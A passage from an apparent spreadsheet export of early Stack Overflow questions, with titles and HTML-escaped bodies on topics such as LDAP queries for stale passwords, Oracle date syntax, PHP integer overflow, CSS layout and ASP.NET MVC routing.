&lt;p&gt;The problem is that I need to add additional filters to only look for users who are in certain security groups.  This is hard to do with the "dsquery user" syntax that has the built-in -stalepwd option, so I've been using the "dsquery * -filter" option which allows you to use LDAP query syntax.  Unfortunately, while its relatively easy to do apply the other filters with an LDAP query, I'm having trouble filtering users who have a password age greater than n.&lt;/p&gt;
&lt;p&gt;Does anyone know the syntax (or if it is even possible) to filter for old passwords using the "dsquery * -filter" method instead of the "dsquery user -stalepwd" method.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Flash Screenshot</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're trying to send an image of a large SWF file to a server to have it mailed out and we're having a bit of trouble with transmission time. &lt;/p&gt;
&lt;p&gt;The SWF is about 900px x 600px and restricted to AS2 so we've been using this Bitmap Exporter class. We've tried using several different ways to transmit the data; base10, base36 and base128 but none of them will send the file in any kind of timely manner.&lt;/p&gt;
&lt;p&gt;Right now we're dealing with 60-120 seconds per image which isn't acceptable.&lt;/p&gt;
&lt;p&gt;Has anyone any advice for dealing with either this class or another for sending large bitmap data to a server with flash?&lt;/p&gt;
&lt;p&gt;Thank you for your time.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I send an array to php through ajax?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to send an array constructed in javascript with the selected values of a multiple select. Is there a way to send this array to a php script using ajax?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there an html css normalizer that works?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Long ago, I wrote a style 'normalizer' program to scan the ASP/HTML code of a big pile of classic ASP pages (most of which were originally generated from MS-Word documents, so naturally they were littered with superflous stylesheets and massive one-off styles). The style normalizer generated a minimal set of stylesheets and styles and a new 'sanitized' asp/html document, so that the sanitized document produced exactly the same rendered output as the original (verified with screenshot image comparisons).&lt;/p&gt;
&lt;p&gt;Every now and then, I run across a need for a program like this, and am toying with the idea of writing one for commercial release.&lt;/p&gt;
&lt;p&gt;My googling skills have not turned up anything exactly like this (HTML:Normalize Perl module and HTML Tidy project just seem to clean up tags).&lt;/p&gt;
&lt;p&gt;So, my questions are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;is there such a tool already, commercial or otherwise?&lt;/li&gt;
&lt;li&gt;if not, does anybody really need it?&lt;/li&gt;
&lt;li&gt;if so, what features would make it truly worthwhile?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;re #3 for example, collecting a base stylesheet for a set of pages, or adjusting all pages to use a given base stylesheet; preserving classic asp commands, following #includes, preserving asp.net embedded scripts, et al. The more specific and numerous, the better.&lt;/p&gt;
&lt;p&gt;Example:&lt;br /&gt;
Old html w/embedded tags&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;html&amp;gt;&amp;lt;head&amp;gt;
&amp;lt;title&amp;gt;title&amp;lt;/title&amp;gt;
&amp;lt;style type='css/text'&amp;gt;
.cls1 { font-family: arial; font-size: 10px; font-weight: bold; }
&amp;lt;/style&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;% somefunction() %&amp;gt;
&amp;lt;div class='cls1' style='font-size:10px;'&amp;gt;test div&amp;lt;/div&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;New html&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;html&amp;gt;&amp;lt;head&amp;gt;
&amp;lt;title&amp;gt;title&amp;lt;/title&amp;gt;
&amp;lt;style type='css/text'&amp;gt;
.cls1 { font-family: arial; font-size: 10px; font-weight: bold; }
&amp;lt;/style&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;% somefunction() %&amp;gt;
&amp;lt;div class='cls1'&amp;gt;test div&amp;lt;/div&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Note that the style on the div is gone, since it was redundant with the class cls1&lt;/p&gt;
&lt;p&gt;EDIT: removed the term 'sanitizer' since i'm not focused on XSS attacks or filtering input in comments, merely on consolidating a lot of ad-hoc styles and random CSS classes into a minimal coherent set of stylesheets.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Excel workbooks produced by POI don't work when linked</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here is what I'm doing :&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Create a workbook in memory (book = new HSSFWorkbook(), ...)&lt;/li&gt;
&lt;li&gt;Save it to disk (book.write(...))&lt;/li&gt;
&lt;li&gt;Open in Excel (ok)&lt;/li&gt;
&lt;li&gt;Create another workbook in Excel, which links to the first one (=PoiWorkbook?xls!A1)&lt;/li&gt;
&lt;li&gt;Close Excel&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Then everytime I open the second workbook again, all the links are #N/A, unless I also open the POI-generated workbook at the same time.&lt;/p&gt;
&lt;p&gt;I never saw this behaviour with standard workbooks created in Excel.
Anyone has seen this and found a workaround ?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I integrate Oracle BI into an existing application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an existing application written in Perl. Now I need to integrate this application with OBI. The plan is having a button the user can click on to open OBI in an &lt;em&gt;iframe&lt;/em&gt;. OBI resides on a different server from the running application.&lt;/p&gt;
&lt;p&gt;Has anyone done this before, know what is the best practice for doing this, and what is the effort of doing this? &lt;br&gt;
Another question is is it possible to add customizations to the OBI displayed in the &lt;em&gt;iframe&lt;/em&gt;.?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Simple Oracle SQL date syntax question</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to convert a working MS Access query to run on an Oracle database being accessed via VB Script (.asp). This is the last section of the WHERE clause:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sql = sql &amp;amp; "WHERE (UAT.HB.MB_MODE = 'A' AND   UAT.HB.PRINT_DATE &amp;gt;= '" 
&amp;amp; SD &amp;amp; "' AND UAT.HB.PRINT_DATE &amp;lt;= '" &amp;amp; ED  &amp;amp;"'  )"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The variable "SD" (i.e. "start date") is a text string that can contain a value such as "11/11/2008". The same goes for the variable "ED" (i.e. "end date").&lt;/p&gt;
&lt;p&gt;However, the dates do not work. Does Oracle require a special way to use dates?&lt;/p&gt;
&lt;p&gt;Do the dates have to be converted? Do I surround them with the '#' keyword like you would in MS Access?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to center an image horizontally and align it to the bottom of the container?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I center an image horizontally and aligned to the bottom of the container at the same time? &lt;/p&gt;
&lt;p&gt;I have been able to center the image horizontally by its self. I have also been able to align the bottom of the container by its self. But I have not been able to do both at the same time. &lt;/p&gt;
&lt;p&gt;Here is what I have:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;.image_block {
    width: 175px;
    height: 175px;
    position: relative;
    margin: 0 auto;
}
.image_block a img {
position: absolute;
bottom: 0;
}
&amp;lt;div class="image_block"&amp;gt;
    &amp;lt;a href="..."&amp;gt;&amp;lt;img src="..." border="0"&amp;gt;&amp;lt;/a&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That code aligns the image to the bottom of the div. What do I need to add/change to make it also center the image horizontally inside the div? The image size is not known before hand but it will be 175x175 or less.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How should I set the default proxy to use default credentials?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The following code works for me:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var webProxy = WebProxy.GetDefaultProxy();
webProxy.UseDefaultCredentials = true;
WebRequest.DefaultWebProxy = webProxy;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Unfortunately, &lt;code&gt;WebProxy.GetDefaultProxy()&lt;/code&gt; is deprecated.  What else should I be doing?&lt;/p&gt;
&lt;p&gt;(using app.config to set the defaultProxy settings is not allowed in my deployment)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I create a Generic Linked List?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to use a Generic Linked List to hold some WorkFlow steps in my application.  Here is how I'm persisting it to my database.&lt;/p&gt;
&lt;p&gt;OrderID&amp;nbsp;&amp;nbsp;WorkFlowStepID&amp;nbsp;&amp;nbsp;ParentWorkFlowStepID&lt;br/&gt;
178373&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;NULL&lt;br/&gt;
178373&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;2&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;1&lt;br/&gt;
178373&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;3&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;2&lt;br/&gt;&lt;/p&gt;
&lt;p&gt;I get this dataset back in a datareader object.  I then loop through the datareader and create a WorkFlowStep object that includes a WorkFlowStepID property and a ParentWorkFlowStepID property.  I add the first object to my LinkedList by using the .AddFirst() method.  My next idea is to create the next object and then insert it after the object in the LinkedList where it's WorkFlowStepID is equal to the new object's ParentWorkFlowStepID.  I can't figure out of to find the object in the LinkedList.  The find() method is asking for a value, but I don't understand what value it is, or how I can find it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET MVC fails at install</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need some help on asp.net mvc install.&lt;/p&gt;
&lt;p&gt;I got the below two errors when I try to install ASP.NET MVC Beta:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Faulting application devenv.exe, version 9.0.21022.8, time stamp 0x47317b3d, faulting module unknown, version 0.0.0.0, time stamp 0x00000000, exception code 0xc0000005, fault offset 0x006c0061, process id 0x11d8, application start time 0x01c949b7447a7a50.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;*Product: Microsoft ASP.NET MVC Beta -- Error 1722. There is a problem with this Windows Installer package. A program run as part of the setup did not finish as expected. Contact your support personnel or package vendor. Action VisualStudio_VSSetup_Command, location: D:\Program Files\Microsoft Visual Studio 9.0v2\Common7\IDE\devenv.exe, command: /setup* &lt;/p&gt;
&lt;p&gt;I uninstalled and then installed Visual Studio but nothing changed.&lt;/p&gt;
&lt;p&gt;I have the following configuration: 
Visual Studio 2008 sp1, 
.net 3.5 sp1, 
Windows Server 2008&lt;/p&gt;
&lt;p&gt;Does anyone has a solution for this?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hosted subversion recommendations or suggestions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm investigating using hosted subversion for a new project at work and was wondering if anyone had any experiences they would share.&lt;/p&gt;
&lt;p&gt;I've personally used &lt;a href="http://www.beanstalkapp.com/" rel="nofollow"&gt;Beanstalk&lt;/a&gt; for small projects at home, but not with mulitple users or a large repository.&lt;/p&gt;
&lt;p&gt;What/who have you used?&lt;/p&gt;
&lt;p&gt;For what size/type of project?&lt;/p&gt;
&lt;p&gt;What was your experience? (Uptime, performance, customer service, etc.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I integrate checked out files into a different branch on perforce</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We were working on a design, and for that we created the skeleton of the classes in our main branch.  Now, we are starting to code, and for that we got a new branch.  So, it would be nice if I can move all the new files in the main branch into the new branch.  However, I cannot check them in yet.  So, is it possible to integrate the checked out changelist?  Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to embed a swf on top of a html page?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to embed a swf over a html page, like a floating video watching panel. I already have a swf file which will automatically adjust its size according to the browser size, and the swf file is partially transparent. I thought I can just add a div tag, make the position absolute and change z-index bigger, but that doesn't work because the swf just replaced everything that's on the page. &lt;/p&gt;
&lt;p&gt;Here's what I did&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script&amp;gt;
      swfobject.embedSWF("swf/float.swf", "header", "100%", "100%", "9.0.0");
&amp;lt;/script&amp;gt;
&amp;lt;body bgcolor="#000000"&amp;gt;
      &amp;lt;div id="header"&amp;gt;&amp;lt;/div&amp;gt;
      &amp;lt;div id="shell"&amp;gt;
          things in my html
      &amp;lt;/div&amp;gt;
&amp;lt;/body&amp;gt;
#header {
    position:absolute;
    z-index:100;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any idea? Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>HTML - xml data islands</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am designing a web app and I intent to embed data on an xml island so that I can dynamically render it on an HTML table on the client-side based on options the users will select.&lt;/p&gt;
&lt;p&gt;I have the broad concepts, but I need pointers on how to use DOM in navigating my xml. And how to update my xml island possibly for posting back to the server?&lt;/p&gt;
&lt;p&gt;Please any links to online resources or a quick advice will be very appreciated.&lt;/p&gt;
&lt;p&gt;NB: I understand most of the dynamic HTML concepts and server and client side stuff, so don't shy being very technical in your response:)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to prevent text in a table cell from wrapping</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know how I can prevent the text in a table cell from wrapping?  This is for the header of a table, and the heading is a lot longer than the data under it, but I need it to display on only one line.  It is okay if the column is very wide.&lt;/p&gt;
&lt;p&gt;The HTML of my (simplified) table looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;table&amp;gt;
  &amp;lt;thead&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;th&amp;gt;
        &amp;lt;div&amp;gt;Really long column heading&amp;lt;/div&amp;gt;
      &amp;lt;/th&amp;gt;
      &amp;lt;th&amp;gt;
        &amp;lt;div&amp;gt;Really long column heading&amp;lt;/div&amp;gt;
      &amp;lt;/th&amp;gt;
      &amp;lt;th&amp;gt;
        &amp;lt;div&amp;gt;Really long column heading&amp;lt;/div&amp;gt;
      &amp;lt;/th&amp;gt;
      &amp;lt;th&amp;gt;
        &amp;lt;div&amp;gt;Really long column heading&amp;lt;/div&amp;gt;
      &amp;lt;/th&amp;gt;
      &amp;lt;th&amp;gt;
        &amp;lt;div&amp;gt;Really long column heading&amp;lt;/div&amp;gt;
      &amp;lt;/th&amp;gt;
      &amp;lt;th&amp;gt;
        &amp;lt;div&amp;gt;Really long column heading&amp;lt;/div&amp;gt;
      &amp;lt;/th&amp;gt;
      &amp;lt;th&amp;gt;
        &amp;lt;div&amp;gt;Really long column heading&amp;lt;/div&amp;gt;
      &amp;lt;/th&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/thead&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td&amp;gt;
        &amp;lt;div&amp;gt;data&amp;lt;/div&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td&amp;gt;
        &amp;lt;div&amp;gt;data&amp;lt;/div&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td&amp;gt;
        &amp;lt;div&amp;gt;data&amp;lt;/div&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td&amp;gt;
        &amp;lt;div&amp;gt;data&amp;lt;/div&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td&amp;gt;
        &amp;lt;div&amp;gt;data&amp;lt;/div&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td&amp;gt;
        &amp;lt;div&amp;gt;data&amp;lt;/div&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td&amp;gt;
        &amp;lt;div&amp;gt;data&amp;lt;/div&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The heading itself is wrapped in a div inside the &lt;code&gt;th&lt;/code&gt; tag for reasons pertaining to the javascript on the page.  &lt;/p&gt;
&lt;p&gt;The table is coming out with the headings wrapping onto multiple lines.  This seems to only happen when the table is sufficiently wide, as the browser is trying to avoid horizontal scrolling.  In my case, though, I want horizontal scrolling.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Create a button with an icon in actionscript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to create buttons with icons in Flex dynamically using Actionscript.&lt;/p&gt;
&lt;p&gt;I tried this, with no success:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var closeButton = new Button();
closeButton.setStyle("icon", "@Embed(source='images/closeWindowUp.png");
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to find slow-down in Javascript in IE6</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Something's slowing down my Javascript code in IE6 to where there's a noticeable lag on hover. It's fine in FF, so using firebug isn't that helpful. What tools are out there to help debug this in IE?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;A little more info:&lt;/strong&gt; I don't think there's actually any JS running on the objects that I'm mousing over. (At least none that I've put in.) Just css :hover stuff. Also, I've got both jquery and dojo running on the project, so who knows what they're doing in the background.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to find the index of the first char in a string that is not in a list</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know I can loop over the string or build a regex or invert the set (ASCII isn't that big after all) and search for the first instance of that, but Yuck.&lt;/p&gt;
&lt;p&gt;What I'm looking for is a nice one liner.&lt;/p&gt;
&lt;p&gt;fewer features is better, LINQ is out (for me, don't ask, it's a &lt;em&gt;long&lt;/em&gt; story)&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;The solution I'm going with (unless I see something better)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static int FirstNotMeta(int i, string str)
{
    for(; i &amp;lt; str.Length; i++)
        switch(str[i])
        {
            case '\\':
            case '/':
            case '.':
                continue;
            default:
                return i;
        }
    return -1;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;OK, I cheated, I know in advance what char's I care about.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Force PHP integer overflow</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have some integer arithmetic which for historical reasons has to work the same on PHP as it does in a few statically typed languages.  Since we last upgraded PHP the behavior for overflowing integers has changed.  Basically we are using following formula:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function f($x1, $x2, $x3, $x4)
{
   return (($x1 + $x2) ^ $x3) + $x4;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, even with conversions:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function f($x1, $x2, $x3, $x4)
{
   return intval(intval(intval($x1 + $x2) ^ $x3) + $x4);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am still ending up with the completely wrong number...&lt;/p&gt;
&lt;p&gt;For example, with $x1 = -1580033017, $x2 = -2072974554, $x3 = -1170476976) and $x4 = -1007518822, I end up with -30512150 in PHP and 1617621783 in C#.&lt;/p&gt;
&lt;p&gt;Just adding together $x1 and $x2 I cannot get the right answer:&lt;/p&gt;
&lt;p&gt;In C# I get&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(-1580033017 + -2072974554) = 641959725
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In PHP:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;intval(intval(-1580033017) + intval(-2072974554)) = -2147483648
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which is the same as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;intval(-1580033017 + -2072974554) = -2147483648
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I don't mind writing a "IntegerOverflowAdd" function or something, but I can't quite figure out how (-1580033017 + -2072974554) equals 641959725.  (I do recognize that it is -2147483648 + (2 * 2^31), but -2147483648 + 2^31 is -1505523923 which is greater than Int.Min so why is do you add 2*2^31 and not 2^31?)&lt;/p&gt;
&lt;p&gt;Any help would be appreciated...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can i make a reusable labelFunction for Flex Datagrid?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a label function like :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private function formatDate (item:Object, column:DataGridColumn):String
{
    var df:DateFormatter = new DateFormatter();
    df.formatString = "MM/DD/YY";
    if (column.dataField == "startDate") {
    	return df.format(item.startDate);
    }
    return "ERR";
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which I use in a datacolumn by using &lt;code&gt;labelFunction&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;This works just fine if my data field is called 'startDate'. I want to make this function generic so I can use it everywhere.&lt;/p&gt;
&lt;p&gt;How can I do this. i think i need to use some kind of 'reflection' - or perhaps another approach altogether?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Pluggable edit component in JQuery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm developing an editing component (iframe-based) in JQuery.&lt;/p&gt;
&lt;p&gt;My intention is to make it easy to extend the functionality of the editor through plug-ins. So for example, you might make a plug-in that puts wavy underlines underneath spelling mistakes, or allows images to be inserted, etc.&lt;/p&gt;
&lt;p&gt;I'm happy to work out the technicalities of this myself, but I'm finding it difficult to decide how to architect the API.&lt;/p&gt;
&lt;p&gt;The editor itself is currently a plug-in. You instantiate it through code such as the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$("#id_of_a_div").editComponent();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Does JQuery allow you to have plug-ins inside plug-ins? Or is there some better way of achieving this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to find recent sql update operations acting upon a certain table (SQL Server 2005)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;say I want to find the latest added rows (UPDATE by any user, not necessarily the one which is executing UPDATE)  in XX table.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET and Windows Workflow's (WF) - do we need to stick it in the Application state?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been trying to use WF in my ASP.NET application (actually, it's ASP.NET MVC ... but the fact that it's MVC instead of WebForms should not matter at all).&lt;/p&gt;
&lt;p&gt;Now, I can run the WF and it works fine, etc, but it kicks off ASYNCHRONOUSLY, so any results from the WF (good &lt;em&gt;or&lt;/em&gt; bad) get lost page life cycle.&lt;/p&gt;
&lt;p&gt;I found an &lt;a href="http://msdn.microsoft.com/en-us/library/aa349445.aspx" rel="nofollow" title="please click me!"&gt;MSDN article&lt;/a&gt; that says that in ASP.NET applications, we need to &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Put the &lt;code&gt;WorkflowRuntime&lt;/code&gt; into the Application state&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;WorkflowRuntime&lt;/code&gt; instance has a &lt;code&gt;ManualWorkflowSchedulerService&lt;/code&gt; added to it (whatever that is).&lt;/li&gt;
&lt;li&gt;Use this application state workflow instance when required.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This is different than how I learned to do it:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Make the WorkflowRuntime a static object, that is first created when required.&lt;/li&gt;
&lt;li&gt;Use this static WorkflowRuntime instance on the new workflow you're going to run.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So ... which way is better? Do we need to stick it into the application? What are the differences between the two?&lt;/p&gt;
&lt;p&gt;I understand there's actually TWO questions here...&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Application state vs static object (using lock/null or &lt;a href="http://en.wikipedia.org/wiki/Double_checked_locking_pattern" rel="nofollow" title="click me!!"&gt;double null checking&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;em&gt;DefaultWorkFlowSchedulerService&lt;/em&gt; vs &lt;em&gt;ManualWorkFlowSchedulerService&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;cheers!&lt;/p&gt;
&lt;p&gt;EDIT:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;First question is answered &lt;a href="http://stackoverflow.com/questions/303725/aspnet-application-state-vs-a-static-object" title="go! click click click"&gt;here&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Second question is answered below.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>What are the differences between various threading synchronization options in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can someone explain the difference between:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;lock (someobject) {}&lt;/li&gt;
&lt;li&gt;Using Mutex&lt;/li&gt;
&lt;li&gt;Using Semaphore&lt;/li&gt;
&lt;li&gt;Using Monitor&lt;/li&gt;
&lt;li&gt;Using Other .Net synchronization classes&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I just can't figure it out.  It seems to me the first two are the same?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using the greedy route parameter in the middle of a route definition</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to create routes which follow the structure of a tree navigation system, i.e I want to include the entire path in the tree in my route. So if I had a tree which looked like this&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Computers
&lt;ul&gt;
&lt;li&gt;Software
&lt;ul&gt;
&lt;li&gt;Development&lt;/li&gt;
&lt;li&gt;Graphics&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Hardware
&lt;ul&gt;
&lt;li&gt;CPU&lt;/li&gt;
&lt;li&gt;Graphics cards&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Then I would like to be able to have routes that looks like this&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;site.com/catalog/computers/software/graphics&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This, on it's own is not hard and can be caught by a route which looks like this&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;catalog/{*categories}&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;However I want to be able to add the product information at the end of that URL, something like this&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;site.com/catalog/computers/software/graphics/title=Photoshop&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Which would mean I would requite routes that were defined like the following examples&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;site.com/{*categories}/title={name}&lt;/li&gt;
&lt;li&gt;site.com/{*categories}&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;However the first of these routes are invalid since nothing else can appear after a greedy parameter such as {&lt;em&gt;categories} so I'm a bit stuck. I've been thinking of implementing regex routes or perhaps use IRouteContraint to work my way around this but I can't think of a decent solution that would enable me to also use the &lt;strong&gt;Html.ActionLink(...)&lt;/strong&gt; method to generate outbount URLs which filled in both {&lt;/em&gt;categories} and {name}&lt;/p&gt;
&lt;p&gt;Any advice is greatly apprechiated!&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Some of you may have seen a similar question by me yesterday but that was deleted, by me, since I've since given it more thought and the old question contained incomplete descriptions of my problem&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE 2008/11/26&lt;/strong&gt; I posted the solution at &lt;a href="http://thecodejunkie.blogspot.com/2008/11/supporting-complex-route-patterns-with.html" rel="nofollow"&gt;http://thecodejunkie.blogspot.com/2008/11/supporting-complex-route-patterns-with.html&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's a PHP framework and what's a good one?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am running a site about &lt;a href="http://www.phpframeworks.com/" rel="nofollow"&gt;PHP Frameworks&lt;/a&gt;, but I can't find a exact definition for it, and I am always thinking a question, how to make out a good PHP framework? Features? Manual? Efficiency? Or something?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Third Party Controls for ASP.NET with Ajax Support</t>
  </si>
  <si>
